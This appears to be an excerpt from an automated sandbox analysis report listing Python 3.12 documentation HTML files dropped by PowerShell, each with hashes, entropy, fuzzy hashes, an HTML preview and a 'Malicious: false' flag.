                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Utilities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/utilities.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter perform various utility tasks, ranging from helping C code be more portable across platforms, using Python modules from C, and parsing function arguments and construct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter perform various utility tasks, ranging fr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1996), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):87602
                                                                                                    Entropy (8bit):4.787656783462618
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:9qywM/qUceUSSHMYTveUSZHMYyaeYHgeCHvyfeYHgeCHvwJri7eYHgeCHvoi6IeG:OTbtfcxby9g
                                                                                                    MD5:B48AE78A5C650CCEB1B2212D283E5DA0
                                                                                                    SHA1:1B81E91073965B724874F19DE539CBC1CC8657D0
                                                                                                    SHA-256:CE7F7E170F5ECAF6DF8F77AC02CFADF87345DF890AC8694A84484D7C1C8AF395
                                                                                                    SHA-512:54B64669CFCEE2EA30392D663FBE16A6A961E87929D3033F6DC544EB417898B0D0E93E441A5A92139D7D5957716E497D527A1063C05AB8FDA53D045B0920C7A5
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The Very High Level Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/veryhigh.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter will let you execute Python source code given in a file or a buffer, but they will not let you interact in a more detailed way with the interpreter. Several of these f..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter will let you execute Pytho
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1018), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25026
                                                                                                    Entropy (8bit):4.891239863417193
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:YlQqyyZcMVaeCJjvZeCJjkkeCJj5JWeCJjeJ9EY1JneCJjeJ9NL6JCeCJdnrJbeX:YlQqyBMVaeCJjvZeCJjkkeCJj5JWeCJM
                                                                                                    MD5:2AD8969F499B66CEEA60FBA429CB540B
                                                                                                    SHA1:72B18825F40439BADE47DF7C526FB4A5B9E051B8
                                                                                                    SHA-256:282BC6B2421078AE2E2D7374B05556FDCC8C410EEC97524DA6E37ACCBA1E18DD
                                                                                                    SHA-512:081E97E083A42BB0C8936C5E94E0AB81045B0766E1B47FB378ED38270094D09EE7888F7353F9259019540FDC74E21EA6AB22AF03D5736A4110C75ECBD7A1DA86
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Weak Reference Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/weakref.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python supports weak references as first-class objects. There are two specific object types which directly implement weak references. The first is a simple reference object, and the second acts as ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python supports weak references as first-class objects. Ther
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):675259
                                                                                                    Entropy (8bit):4.856751844355368
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:eq1Q1m0dV1UgB1mJkPBeEmcCSmZG00f5rmJv8AdKgGgEsNhWdOF5sBQbxGYubuxC:eyuxpD95eEmcA0BaM+EsNhWdOF5s6eyg
                                                                                                    MD5:F402DCF60031500AD86915A4C405C838
                                                                                                    SHA1:02AA786E32EA4CEBCB6A274D5B651EDAA526F613
                                                                                                    SHA-256:DD5338F76262FD40AABC17A7B83F23944AB7D57D9380AE3FD65D00627CAF11F4
                                                                                                    SHA-512:91444282340FC1F69DA075777BB9198008A521CE767089AB33462E93D2A7FDFA936B4479E5650770ECCFF8FB6EFD9750A6DD1D1E6DDC354C7F0FD0CE642A3319
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Documentation contents" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/contents.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="What.s New in Python- What.s New In Python 3.12- Summary . Release highlights, New Features- PEP 695: Type Parameter Syntax, PEP 701: Syntactic formalization of f-strings, PEP 684: A Per-Interprete..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="What.s New in Python- What.s New In Python 3.12-
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12864
                                                                                                    Entropy (8bit):4.823832589679693
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:MTpBHtxlbE3Pjn6cMMQjEGP1nYcM676dqEC:MTbtPwrRMMJk3M6764N
                                                                                                    MD5:B64CC95E76E1344FE6A1F473F0264D1E
                                                                                                    SHA1:0BCEDA1D62C52149B556D0C48F87A43E155BFFF5
                                                                                                    SHA-256:72456BDA320FF36A301507C6F5C9E9708AC9BA0520D706041DF3CB8DBD381786
                                                                                                    SHA-512:D5CE4B7DE72683B5A909180F3E8E475F5110FB54F8B3150A39C2ECAECB1D3461E9FAA20BD7D78DCF3B9FAE6B0FC64A207F1BF80B4C1A29874D0239FD3B0A3744
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Copyright" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/copyright.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python and this documentation is: Copyright . 2001-2023 Python Software Foundation. All rights reserved. Copyright . 2000 BeOpen.com. All rights reserved. Copyright . 1995-2000 Corporation for Nati..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python and this documentation is: Copyright . 2001-2023 Python Software Fo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11225
                                                                                                    Entropy (8bit):4.834028944953228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WQrNKHqkX1vOMGMgTMbn/yXMM6TMbnA76dqEC:qHqkl/OTMby8LTM876dqEC
                                                                                                    MD5:AA98E4B44174255266A7A00F40D3ED2E
                                                                                                    SHA1:98E0A6820AA0248EE8B460675483DEA068D6FE18
                                                                                                    SHA-256:D179527D477CF1DBE985F0D290CB124E2C8DB72ED93C10D028006BCC64F73412
                                                                                                    SHA-512:0E2DD3BA8C0A5517EA00081A73618F9CBF7F560F5C6F0746EE5313B2DD6D44648F02CB50E0B092446DDC1159CDB6764D48FE26E02C935FAB941DB1FE92AF141D
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Distributing Python Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/distributing/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Distributing Python Modules &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="styles
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11573
                                                                                                    Entropy (8bit):4.906855752254527
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:IU5UHtxX1vjNrcMGH+byr5OygkcMGHZ76dqEC:MHtxlVcMVbyr5OytcMs76dqEC
                                                                                                    MD5:D77806F56E09EB3943877DEA8140B54F
                                                                                                    SHA1:A4C1A245C50A44E32935D9B337E21D6A069C0F89
                                                                                                    SHA-256:68F161A7423CB26CA625F43196381D49738EE8719ABCA18242495C9F24BC9366
                                                                                                    SHA-512:31641273939C424E58E9D833892E9DC9D384E6DD7C39750AD4F2C388B3E8135BF461B26C9AD6C4396E674CB7C028B1F0E2EDD64D61A2BE40ACCC03AE1DB1C745
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Download &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sea
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (567), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19562
                                                                                                    Entropy (8bit):4.91258489409245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:iHqkl0mptMXn5TMJf23q+jBKVJver1+wIzeIviPmptBhntTMefg76dqEC:2qy3ptmtMl26vJver1XI6MptLZMmg76g
                                                                                                    MD5:046738F5DA1DD5ADEEC508C034190BD9
                                                                                                    SHA1:C704874DDF1496497664AF5EF26650AD2110DBC4
                                                                                                    SHA-256:8A6095CA82F6C83787B64AC36F716360D55071095E7F71EE95C6F6FA6894FA66
                                                                                                    SHA-512:1C7CA5B739B190EDDEE62E7D3E928A596619B4184342C994ECF6A70F341A99B8BBA95A083908BF4D4D24FC4C8ED96B93A4BBED6F6F5DC0701948F2B7F7AF1D05
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="4. Building C and C++ Extensions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/building.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A C extension for CPython is a shared library (e.g. a.so file on Linux,.pyd on Windows), which exports an initialization function. To be importable, the shared library must be available on PYTHONPA..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A C extension for CPython is a shared library
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (670), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):56687
                                                                                                    Entropy (8bit):4.828816641446644
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:KqyhYMj4hYcB13fTNL0YJvyP20RvWnMs764N:UWY+qRdg
                                                                                                    MD5:156C1761D37930F00A53D75A2C7B21D3
                                                                                                    SHA1:294E28A82956F15D68CFC75F621772EA48A62EC5
                                                                                                    SHA-256:03A894BC646595421B43A9DAC8288F8ABA607E37EE62022E94BB8491096C96A6
                                                                                                    SHA-512:E7B9E515C398894B1CCB8A320D9CAD4670F4B849F2A2BDBFA8BB7AA90D0A140E8562ADE35131DF7EB6BA9BB2BCF9DF5733BF1EA296FCFF26CE6B04685762F51D
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Embedding Python in Another Application" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/embedding.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The previous chapters discussed how to extend Python, that is, how to extend the functionality of Python by attaching a library of C functions to it. It is also possible to do it the other way arou..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The previous chapters discussed ho
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (553), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):167659
                                                                                                    Entropy (8bit):4.870286185877593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:rqyUyMM5cGBWeAsiWee4DbrveguqQcRcsEUSShHuFAFd0zLvw13WAX6f6QIQMBxr:uWWeoWeRHH/3Y8QmVOg
                                                                                                    MD5:70059198CDE4AFF5347513AB3AAB6B03
                                                                                                    SHA1:204D538BD3BE58C45104EFAAD44CEC331059661A
                                                                                                    SHA-256:DF067BD9AA8ABAD3C4EA157A8C640475434BC6B150EB7CAB1ABB3E63EB3552BD
                                                                                                    SHA-512:D3F59649EA8E392AA47A5F384995AC4F90125397D326F19D9A9A89AD070CFDD0BBCEE91E1BD66FDB6AAD5FF1261B777BE428FC8297E293FE090548153A99287C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Extending Python with C or C++" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/extending.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="It is quite easy to add new built-in modules to Python, if you know how to program in C. Such extension modules can do two things that can.t be done directly in Python: they can implement new built..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="It is quite easy to add new built-in modu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24084
                                                                                                    Entropy (8bit):4.905820111409463
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Lch8EHqklQGGU2neTMOlrwgJqoP5m9o4mt5yGGG5insTMOv76dqEC:Qqyi70M4qouOrtkCMa764N
                                                                                                    MD5:8C4CF091E64AC5E41867E3AE2B76972B
                                                                                                    SHA1:307DBC3C7B970D1DEA210DD94DA054972F316D18
                                                                                                    SHA-256:6230C0397B2B77017C09733706ABFF9FD495C83FA2784FE92BACD8A4230B0390
                                                                                                    SHA-512:6063E9DB1B87178730529051F5F7268B18C996F9F196BE391F7CFA605311B2F52075A707D3D1AE61242FC5C4CECA6E40E9A47BA541736919A58A407C407DD632
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Extending and Embedding the Python Interpreter" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This document describes how to write modules in C or C++ to extend the Python interpreter with new modules. Those modules can not only define new functions but also new object types and their metho..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This document describes how to wri
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (641), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99436
                                                                                                    Entropy (8bit):4.788158292192944
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:rqywME6ACs4Is2Qh3kgfNDkRIA6VJN2cxzE3d28FQSyuyNbU20iWj0WuwGYyK8Jd:NkWdfvVJPHW2Qj0WRPyKm+g
                                                                                                    MD5:264E1C45550F16E00F7AE050D2B3F478
                                                                                                    SHA1:0EBA18AA1CF8CC8D2A44397815744358852C4171
                                                                                                    SHA-256:2E96995C9BA09E3922EB5BACDEA07648CB218B81C1363527E5957A364175AD49
                                                                                                    SHA-512:6A8A32183F6C870455406256AA1212A1FBB45EEE684DC97A71602A2B490759457AF3658B279480E3854ED03088DD1D4A800FA1A0B94CA1208E762126663C0E64
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="3. Defining Extension Types: Assorted Topics" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/newtypes.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This section aims to give a quick fly-by on the various type methods you can implement and what they do. Here is the definition of PyTypeObject, with some fields only used in debug builds omitted: ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This section aims to give a quick
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (734), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):237726
                                                                                                    Entropy (8bit):4.59582375335333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:zqypMaTNUkFFGrG3ugW1KVjBz0/jLQB2NZBxISik21eq4pwHwwd2OlbYcokIzEL9:55Ft2c4pwn2zzELWzLBSzSLPTBsTx+g
                                                                                                    MD5:520B4BDB784755143E993AFEDD5E58DF
                                                                                                    SHA1:CE5F11EC84DD488827D30043942A77B2B804C769
                                                                                                    SHA-256:AE98DF7F84768DE3E87DD065173C8A2F622D34B9D0E104681727A081600D2CED
                                                                                                    SHA-512:386BC2A27FA8D0BA256BDF613B884D613EC1B76512BA433B42BA0BEC62C5DD481B7F911AB8956C2EA0F0C75BD2BD2F9C2D99F90D9899A7D79EA2DD260DD6C927
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="2. Defining Extension Types: Tutorial" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/newtypes_tutorial.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python allows the writer of a C extension module to define new types that can be manipulated from Python code, much like the built-in str and list types. The code for all extension types follows a ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python allows the writer of a C
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (680), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25927
                                                                                                    Entropy (8bit):4.870024779077443
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:I3snkqyfpde4M69dmDmzlDkpceWMBS764N:I3PqyPM8merMg764N
                                                                                                    MD5:834C916A1D9B5BA36345AF856E2ADB30
                                                                                                    SHA1:EE4C3B0249DEFEF04BF1366CDD1E16BB12E00BF7
                                                                                                    SHA-256:465FF7098D8ED28436279761D571F6A17989783D17C7299338292C595D18DDEA
                                                                                                    SHA-512:5235DFCBA51B5466D7B4855DA429896B9E3B43A5853D60A4A09EBD4C581EF52E8F92112356394D5A59BA199D95514829CE9F92E10A078AD19F406EDFC47827BD
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="5. Building C and C++ Extensions on Windows" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/extending/windows.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter briefly explains how to create a Windows extension module for Python using Microsoft Visual C++, and follows with more detailed background information on how it works. The explanatory ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter briefly explains how t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (499), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97317
                                                                                                    Entropy (8bit):4.888386650215292
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:YykqyeyrMzq8CdfcLiEmzLe9VlI+tRM7Yt4cZQljo4oar78L8iivUHaVdhWl9yQu:Yy51qdAXwLtxWXJg
                                                                                                    MD5:BCE24FE6598D3BBA1AF196459B7BFFDC
                                                                                                    SHA1:301FDEC3633227EF49046AC9CDED3EF01FA2A7E8
                                                                                                    SHA-256:05C97120CD24A78A002C6EF3F85FF4FF865052B7B24B8AE668C81BF546B4683B
                                                                                                    SHA-512:1CEB649C288F71136DF513F43CA36F9EF7B80BBB9EC1F741466FB62D98D828FDAADDCD778F2C60BE857BF790EFFCDC0C6E1FBA0FFB847B04885A9CF14C020C67
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Design and History FAQ" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/faq/design.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Contents: Design and History FAQ- Why does Python use indentation for grouping of statements?, Why am I getting strange results with simple arithmetic operations?, Why are floating-point calculatio..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Contents: Design and History FAQ- Why does Python use indentati
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (619), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):51765
                                                                                                    Entropy (8bit):4.997448558312701
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:UiPqy7A7XI+MzgJVQirQAUrBjNEltdZKowQDviA7XdsMQX764N:nqyCpMza0AU/EltmoLDeMQX764N
                                                                                                    MD5:AEF49929087C581D4A5F129E152EAAA8
                                                                                                    SHA1:914087D78F8D5A935987358B45C78FEA6B71CAE5
                                                                                                    SHA-256:7B948D99F511EA000EA0217A74FCCE7E4C34CCCC0F739F5DFEC785268B178772
                                                                                                    SHA-512:5127AEC0E875090194D33AB9B32B85FF1894118F774D811D281C6D9CE2123A82FD2F03050EA1C45376AD30FD7B8DE3CCBB3227A6817F62D4FC44094DFBCD64AE
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Extending/Embedding FAQ" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/faq/extending.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Contents: Extending/Embedding FAQ- Can I create my own functions in C?, Can I create my own functions in C++?, Writing C is hard; are there any alternatives?, How can I execute arbitrary Python sta..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Contents: Extending/Embedding FAQ- Can I create my own func
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (431), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48808
                                                                                                    Entropy (8bit):5.029010215859102
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:RR9FcqyprLwxMzSBdQhkxhYlwleRKBzdMdoYt8alzxWVyKEgluEkzfr8wtMQD76g:RRvcqypoxMzS/QhyYylqj8alPKNurzfZ
                                                                                                    MD5:0AA439130EBE77861A62E8D5DCFE94E5
                                                                                                    SHA1:640888D53B4C933E01C5D124C6C1298DDC2BDCDB
                                                                                                    SHA-256:4117215220AC5391C8740C17062386DCFD76911A8B4AA393DB268B2C2C4A046B
                                                                                                    SHA-512:E1B4CBEA9BC30D24691BB0505AEC211AEEE3734CFE628A23C11CD3FF383EEE6D9F5938F8D56C263E052AF205726556C3EFF10B94233AAC5BA1903E13F09C2A9A
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="General Python FAQ" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/faq/general.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Contents: General Python FAQ- General Information- What is Python?, What is the Python Software Foundation?, Are there copyright restrictions on the use of Python?, Why was Python created in the fi..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Contents: General Python FAQ- General Information- What is Python?
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20264
                                                                                                    Entropy (8bit):4.9492838101459675
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:utIw4HqklaHFteHtt6nnTMzpW5OUZuzBlrHFteSttenDTMQh76dqEC:JwMqyai+TMzpW5bZYrin3MQh764N
                                                                                                    MD5:94BACFB13400CCF32DAA0C3F4CE95309
                                                                                                    SHA1:E6DCFC79C5D9C7AB3C234020910383C40376C358
                                                                                                    SHA-256:8D28C8A17D84244043F0157E5CCD925F8DF4D21D2ED26CC90A8B505FFBB948FC
                                                                                                    SHA-512:547624AE98FE099EBDD5925A5D31372D2279540F07D55B4C8839BE8A895CEE84142B5A9E093DAFD26AD465223DD300F1E834D7D7F1BC90D7D7BF4A63DCBF0CD3
                                                                                                    Malicious:false
